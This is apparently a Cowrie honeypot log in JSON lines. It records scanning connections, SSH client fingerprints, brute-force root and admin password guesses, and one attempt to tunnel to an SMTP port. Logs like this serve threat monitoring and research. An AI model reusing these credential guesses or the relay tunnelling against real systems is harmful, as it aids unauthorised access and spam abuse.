{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59984,"dst_ip":"1.2.3.4","dst_port":23,"session":"a93f1290f7aa","protocol":"telnet","message":"New connection: 212.227.125.160:59984 (1.2.3.4:23) [session: a93f1290f7aa]","sensor":"my-vps","timestamp":"2025-08-26T15:34:28.622206Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"90ab06084cdd","protocol":"ssh","message":"New connection: 212.227.235.229:51824 (1.2.3.4:22) [session: 90ab06084cdd]","sensor":"my-vps","timestamp":"2025-08-26T15:34:42.735573Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:34:42.828036Z","src_ip":"212.227.235.229","session":"90ab06084cdd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58546,"dst_ip":"1.2.3.4","dst_port":23,"session":"a272fcae0804","protocol":"telnet","message":"New connection: 212.227.125.160:58546 (1.2.3.4:23) [session: a272fcae0804]","sensor":"my-vps","timestamp":"2025-08-26T15:34:52.346988Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58550,"dst_ip":"1.2.3.4","dst_port":23,"session":"cab69fa76f0e","protocol":"telnet","message":"New connection: 212.227.125.160:58550 (1.2.3.4:23) [session: cab69fa76f0e]","sensor":"my-vps","timestamp":"2025-08-26T15:34:55.405597Z"}
{"eventid":"cowrie.session.closed","duration":30.747186183929443,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:34:59.369325Z","src_ip":"212.227.125.160","session":"a93f1290f7aa"}
{"eventid":"cowrie.session.closed","duration":33.10132098197937,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:35:25.448241Z","src_ip":"212.227.125.160","session":"a272fcae0804"}
{"eventid":"cowrie.session.closed","duration":34.05615043640137,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:35:29.461684Z","src_ip":"212.227.125.160","session":"cab69fa76f0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39162,"dst_ip":"1.2.3.4","dst_port":23,"session":"0e615387b98e","protocol":"telnet","message":"New connection: 212.227.125.160:39162 (1.2.3.4:23) [session: 0e615387b98e]","sensor":"my-vps","timestamp":"2025-08-26T15:35:32.603181Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39166,"dst_ip":"1.2.3.4","dst_port":23,"session":"aa62a134f3c4","protocol":"telnet","message":"New connection: 212.227.125.160:39166 (1.2.3.4:23) [session: aa62a134f3c4]","sensor":"my-vps","timestamp":"2025-08-26T15:35:35.025395Z"}
{"eventid":"cowrie.session.connect","src_ip":"59.0.218.163","src_port":50519,"dst_ip":"1.2.3.4","dst_port":23,"session":"e8715e24a072","protocol":"telnet","message":"New connection: 59.0.218.163:50519 (1.2.3.4:23) [session: e8715e24a072]","sensor":"my-vps","timestamp":"2025-08-26T15:35:42.120623Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36452,"dst_ip":"1.2.3.4","dst_port":22,"session":"26dc68a933d2","protocol":"ssh","message":"New connection: 212.227.235.229:36452 (1.2.3.4:22) [session: 26dc68a933d2]","sensor":"my-vps","timestamp":"2025-08-26T15:35:47.784375Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35998,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ec8e5f9944c","protocol":"telnet","message":"New connection: 212.227.235.229:35998 (1.2.3.4:23) [session: 7ec8e5f9944c]","sensor":"my-vps","timestamp":"2025-08-26T15:35:48.126015Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:35:48.553517Z","src_ip":"212.227.235.229","session":"26dc68a933d2"}
{"eventid":"cowrie.session.closed","duration":0.43145251274108887,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:35:48.557387Z","src_ip":"212.227.235.229","session":"7ec8e5f9944c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43834,"dst_ip":"1.2.3.4","dst_port":23,"session":"70b93b2d3289","protocol":"telnet","message":"New connection: 212.227.125.160:43834 (1.2.3.4:23) [session: 70b93b2d3289]","sensor":"my-vps","timestamp":"2025-08-26T15:35:55.071054Z"}
{"eventid":"cowrie.session.closed","duration":31.48548436164856,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:36:04.088583Z","src_ip":"212.227.125.160","session":"0e615387b98e"}
{"eventid":"cowrie.session.closed","duration":30.63636040687561,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:36:05.661681Z","src_ip":"212.227.125.160","session":"aa62a134f3c4"}
{"eventid":"cowrie.session.closed","duration":30.565234422683716,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:36:12.685789Z","src_ip":"59.0.218.163","session":"e8715e24a072"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35108,"dst_ip":"1.2.3.4","dst_port":22,"session":"1183f5a3d5ee","protocol":"ssh","message":"New connection: 212.227.235.229:35108 (1.2.3.4:22) [session: 1183f5a3d5ee]","sensor":"my-vps","timestamp":"2025-08-26T15:36:13.706209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:36:14.273453Z","src_ip":"212.227.235.229","session":"1183f5a3d5ee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T15:36:14.274209Z","src_ip":"212.227.235.229","session":"1183f5a3d5ee"}
{"eventid":"cowrie.login.success","username":"root","password":"654321aA","message":"login attempt [root/654321aA] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:36:17.490608Z","src_ip":"212.227.235.229","session":"1183f5a3d5ee"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:36:18.216835Z","src_ip":"212.227.235.229","session":"1183f5a3d5ee"}
{"eventid":"cowrie.session.closed","duration":30.368584156036377,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:36:25.439558Z","src_ip":"212.227.125.160","session":"70b93b2d3289"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52600,"dst_ip":"1.2.3.4","dst_port":23,"session":"7587ecfdb505","protocol":"telnet","message":"New connection: 212.227.125.160:52600 (1.2.3.4:23) [session: 7587ecfdb505]","sensor":"my-vps","timestamp":"2025-08-26T15:36:44.288596Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39681,"dst_ip":"1.2.3.4","dst_port":23,"session":"e3f330c4ffd8","protocol":"telnet","message":"New connection: 212.227.125.160:39681 (1.2.3.4:23) [session: e3f330c4ffd8]","sensor":"my-vps","timestamp":"2025-08-26T15:37:05.020441Z"}
{"eventid":"cowrie.session.closed","duration":32.82108759880066,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:37:17.109615Z","src_ip":"212.227.125.160","session":"7587ecfdb505"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49688,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6c84264aac5","protocol":"ssh","message":"New connection: 217.72.205.35:49688 (1.2.3.4:22) [session: e6c84264aac5]","sensor":"my-vps","timestamp":"2025-08-26T15:37:17.230449Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:37:17.231608Z","src_ip":"217.72.205.35","session":"e6c84264aac5"}
{"eventid":"cowrie.session.closed","duration":46.142425775527954,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:37:51.162790Z","src_ip":"212.227.125.160","session":"e3f330c4ffd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48638,"dst_ip":"1.2.3.4","dst_port":23,"session":"4da81d3dec25","protocol":"telnet","message":"New connection: 212.227.125.160:48638 (1.2.3.4:23) [session: 4da81d3dec25]","sensor":"my-vps","timestamp":"2025-08-26T15:38:10.832668Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36150,"dst_ip":"1.2.3.4","dst_port":23,"session":"6fa7c4d437c2","protocol":"telnet","message":"New connection: 212.227.125.160:36150 (1.2.3.4:23) [session: 6fa7c4d437c2]","sensor":"my-vps","timestamp":"2025-08-26T15:38:40.781219Z"}
{"eventid":"cowrie.session.closed","duration":30.529224395751953,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:38:41.361826Z","src_ip":"212.227.125.160","session":"4da81d3dec25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31060,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1561f443e03","protocol":"ssh","message":"New connection: 212.227.235.229:31060 (1.2.3.4:22) [session: d1561f443e03]","sensor":"my-vps","timestamp":"2025-08-26T15:38:56.368318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T15:38:56.369045Z","src_ip":"212.227.235.229","session":"d1561f443e03"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T15:38:56.473330Z","src_ip":"212.227.235.229","session":"d1561f443e03"}
{"eventid":"cowrie.login.failed","username":"admin","password":"reaver","message":"login attempt [admin/reaver] failed","sensor":"my-vps","timestamp":"2025-08-26T15:38:56.974337Z","src_ip":"212.227.235.229","session":"d1561f443e03"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ralphie","message":"login attempt [admin/ralphie] failed","sensor":"my-vps","timestamp":"2025-08-26T15:38:58.081474Z","src_ip":"212.227.235.229","session":"d1561f443e03"}
{"eventid":"cowrie.login.failed","username":"admin","password":"raketa","message":"login attempt [admin/raketa] failed","sensor":"my-vps","timestamp":"2025-08-26T15:38:59.189305Z","src_ip":"212.227.235.229","session":"d1561f443e03"}
{"eventid":"cowrie.login.failed","username":"admin","password":"rainer","message":"login attempt [admin/rainer] failed","sensor":"my-vps","timestamp":"2025-08-26T15:39:00.295872Z","src_ip":"212.227.235.229","session":"d1561f443e03"}
{"eventid":"cowrie.login.failed","username":"admin","password":"radius","message":"login attempt [admin/radius] failed","sensor":"my-vps","timestamp":"2025-08-26T15:39:01.403699Z","src_ip":"212.227.235.229","session":"d1561f443e03"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:39:02.511044Z","src_ip":"212.227.235.229","session":"d1561f443e03"}
{"eventid":"cowrie.session.closed","duration":30.61034059524536,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:39:11.391465Z","src_ip":"212.227.125.160","session":"6fa7c4d437c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38064,"dst_ip":"1.2.3.4","dst_port":23,"session":"ab6f4aa696cd","protocol":"telnet","message":"New connection: 212.227.125.160:38064 (1.2.3.4:23) [session: ab6f4aa696cd]","sensor":"my-vps","timestamp":"2025-08-26T15:39:23.165335Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34304,"dst_ip":"1.2.3.4","dst_port":23,"session":"ecc2e520d896","protocol":"telnet","message":"New connection: 212.227.125.160:34304 (1.2.3.4:23) [session: ecc2e520d896]","sensor":"my-vps","timestamp":"2025-08-26T15:39:31.662955Z"}
{"eventid":"cowrie.session.closed","duration":31.218549251556396,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:39:54.383795Z","src_ip":"212.227.125.160","session":"ab6f4aa696cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43856,"dst_ip":"1.2.3.4","dst_port":22,"session":"f70ff59997d7","protocol":"ssh","message":"New connection: 212.227.125.160:43856 (1.2.3.4:22) [session: f70ff59997d7]","sensor":"my-vps","timestamp":"2025-08-26T15:40:02.650019Z"}
{"eventid":"cowrie.session.closed","duration":34.986226320266724,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:40:06.649090Z","src_ip":"212.227.125.160","session":"ecc2e520d896"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45768,"dst_ip":"1.2.3.4","dst_port":23,"session":"c639f83b98e7","protocol":"telnet","message":"New connection: 212.227.125.160:45768 (1.2.3.4:23) [session: c639f83b98e7]","sensor":"my-vps","timestamp":"2025-08-26T15:40:15.121269Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60486,"dst_ip":"1.2.3.4","dst_port":23,"session":"ad8a04c53aa1","protocol":"telnet","message":"New connection: 212.227.125.160:60486 (1.2.3.4:23) [session: ad8a04c53aa1]","sensor":"my-vps","timestamp":"2025-08-26T15:40:16.450578Z"}
{"eventid":"cowrie.session.closed","duration":"16.1","message":"Connection lost after 16.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:40:18.782884Z","src_ip":"212.227.125.160","session":"f70ff59997d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33880,"dst_ip":"1.2.3.4","dst_port":22,"session":"564a15f7d9b8","protocol":"ssh","message":"New connection: 212.227.125.160:33880 (1.2.3.4:22) [session: 564a15f7d9b8]","sensor":"my-vps","timestamp":"2025-08-26T15:40:19.089631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.7.4","message":"Remote SSH version: SSH-2.0-libssh_0.7.4","sensor":"my-vps","timestamp":"2025-08-26T15:40:19.135598Z","src_ip":"212.227.125.160","session":"564a15f7d9b8"}
{"eventid":"cowrie.client.kex","hassh":"e37f354a101aff5871ba233aa82b84ec","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e37f354a101aff5871ba233aa82b84ec","sensor":"my-vps","timestamp":"2025-08-26T15:40:19.622383Z","src_ip":"212.227.125.160","session":"564a15f7d9b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48816,"dst_ip":"1.2.3.4","dst_port":23,"session":"fedc01407f78","protocol":"telnet","message":"New connection: 212.227.125.160:48816 (1.2.3.4:23) [session: fedc01407f78]","sensor":"my-vps","timestamp":"2025-08-26T15:40:20.595532Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:40:20.881870Z","src_ip":"212.227.125.160","session":"564a15f7d9b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53055,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a3b78a6203a","protocol":"ssh","message":"New connection: 212.227.235.229:53055 (1.2.3.4:22) [session: 6a3b78a6203a]","sensor":"my-vps","timestamp":"2025-08-26T15:40:44.557406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T15:40:44.558366Z","src_ip":"212.227.235.229","session":"6a3b78a6203a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T15:40:44.684007Z","src_ip":"212.227.235.229","session":"6a3b78a6203a"}
{"eventid":"cowrie.login.success","username":"root","password":"admin01","message":"login attempt [root/admin01] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:40:45.269122Z","src_ip":"212.227.235.229","session":"6a3b78a6203a"}
{"eventid":"cowrie.session.closed","duration":30.24874210357666,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:40:45.369918Z","src_ip":"212.227.125.160","session":"c639f83b98e7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-26T15:40:45.403774Z","session":"6a3b78a6203a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-26T15:40:45.529556Z","src_ip":"212.227.235.229","session":"6a3b78a6203a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:40:45.655877Z","src_ip":"212.227.235.229","session":"6a3b78a6203a"}
{"eventid":"cowrie.session.closed","duration":30.414893865585327,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:40:46.865404Z","src_ip":"212.227.125.160","session":"ad8a04c53aa1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34414,"dst_ip":"1.2.3.4","dst_port":23,"session":"9f2f13027e11","protocol":"telnet","message":"New connection: 212.227.125.160:34414 (1.2.3.4:23) [session: 9f2f13027e11]","sensor":"my-vps","timestamp":"2025-08-26T15:40:52.151975Z"}
{"eventid":"cowrie.session.closed","duration":33.6695556640625,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:40:54.265024Z","src_ip":"212.227.125.160","session":"fedc01407f78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33248,"dst_ip":"1.2.3.4","dst_port":23,"session":"20fa24bd09f5","protocol":"telnet","message":"New connection: 212.227.125.160:33248 (1.2.3.4:23) [session: 20fa24bd09f5]","sensor":"my-vps","timestamp":"2025-08-26T15:40:55.720437Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:40:55.805608Z","src_ip":"212.227.125.160","session":"20fa24bd09f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:40:55.862334Z","src_ip":"212.227.125.160","session":"20fa24bd09f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34412,"dst_ip":"1.2.3.4","dst_port":23,"session":"3ca7014b8b5e","protocol":"telnet","message":"New connection: 212.227.125.160:34412 (1.2.3.4:23) [session: 3ca7014b8b5e]","sensor":"my-vps","timestamp":"2025-08-26T15:40:58.012152Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59792,"dst_ip":"1.2.3.4","dst_port":23,"session":"8e1977f8b190","protocol":"telnet","message":"New connection: 212.227.125.160:59792 (1.2.3.4:23) [session: 8e1977f8b190]","sensor":"my-vps","timestamp":"2025-08-26T15:41:14.683998Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34226,"dst_ip":"1.2.3.4","dst_port":23,"session":"742873579768","protocol":"telnet","message":"New connection: 212.227.125.160:34226 (1.2.3.4:23) [session: 742873579768]","sensor":"my-vps","timestamp":"2025-08-26T15:41:19.562479Z"}
{"eventid":"cowrie.session.closed","duration":32.270827770233154,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:41:24.422708Z","src_ip":"212.227.125.160","session":"9f2f13027e11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41076,"dst_ip":"1.2.3.4","dst_port":23,"session":"f2d873d2952b","protocol":"telnet","message":"New connection: 212.227.125.160:41076 (1.2.3.4:23) [session: f2d873d2952b]","sensor":"my-vps","timestamp":"2025-08-26T15:41:26.725089Z"}
{"eventid":"cowrie.session.closed","duration":30.712000131607056,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:41:28.724076Z","src_ip":"212.227.125.160","session":"3ca7014b8b5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41088,"dst_ip":"1.2.3.4","dst_port":23,"session":"53c9eeafaa5b","protocol":"telnet","message":"New connection: 212.227.125.160:41088 (1.2.3.4:23) [session: 53c9eeafaa5b]","sensor":"my-vps","timestamp":"2025-08-26T15:41:34.913424Z"}
{"eventid":"cowrie.session.closed","duration":32.3626389503479,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:41:47.046570Z","src_ip":"212.227.125.160","session":"8e1977f8b190"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57666,"dst_ip":"1.2.3.4","dst_port":23,"session":"02da1329c73f","protocol":"telnet","message":"New connection: 212.227.125.160:57666 (1.2.3.4:23) [session: 02da1329c73f]","sensor":"my-vps","timestamp":"2025-08-26T15:41:48.716135Z"}
{"eventid":"cowrie.session.closed","duration":30.828519105911255,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:41:50.390931Z","src_ip":"212.227.125.160","session":"742873579768"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57672,"dst_ip":"1.2.3.4","dst_port":23,"session":"ef08a87d9677","protocol":"telnet","message":"New connection: 212.227.125.160:57672 (1.2.3.4:23) [session: ef08a87d9677]","sensor":"my-vps","timestamp":"2025-08-26T15:41:50.722373Z"}
{"eventid":"cowrie.session.closed","duration":30.693797826766968,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:41:57.417911Z","src_ip":"212.227.125.160","session":"f2d873d2952b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46942,"dst_ip":"1.2.3.4","dst_port":23,"session":"32f6b2643af3","protocol":"telnet","message":"New connection: 212.227.125.160:46942 (1.2.3.4:23) [session: 32f6b2643af3]","sensor":"my-vps","timestamp":"2025-08-26T15:41:59.376175Z"}
{"eventid":"cowrie.session.closed","duration":34.61496663093567,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:42:09.528298Z","src_ip":"212.227.125.160","session":"53c9eeafaa5b"}
{"eventid":"cowrie.session.closed","duration":31.131021738052368,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:42:19.847088Z","src_ip":"212.227.125.160","session":"02da1329c73f"}
{"eventid":"cowrie.session.closed","duration":30.806827068328857,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:42:21.529126Z","src_ip":"212.227.125.160","session":"ef08a87d9677"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60696,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f32318b75e6","protocol":"telnet","message":"New connection: 212.227.125.160:60696 (1.2.3.4:23) [session: 4f32318b75e6]","sensor":"my-vps","timestamp":"2025-08-26T15:42:23.012865Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51426,"dst_ip":"1.2.3.4","dst_port":23,"session":"f91acce8276c","protocol":"telnet","message":"New connection: 212.227.125.160:51426 (1.2.3.4:23) [session: f91acce8276c]","sensor":"my-vps","timestamp":"2025-08-26T15:42:31.679306Z"}
{"eventid":"cowrie.session.closed","duration":34.9199333190918,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:42:34.296040Z","src_ip":"212.227.125.160","session":"32f6b2643af3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51428,"dst_ip":"1.2.3.4","dst_port":23,"session":"e804ed4036da","protocol":"telnet","message":"New connection: 212.227.125.160:51428 (1.2.3.4:23) [session: e804ed4036da]","sensor":"my-vps","timestamp":"2025-08-26T15:42:38.876643Z"}
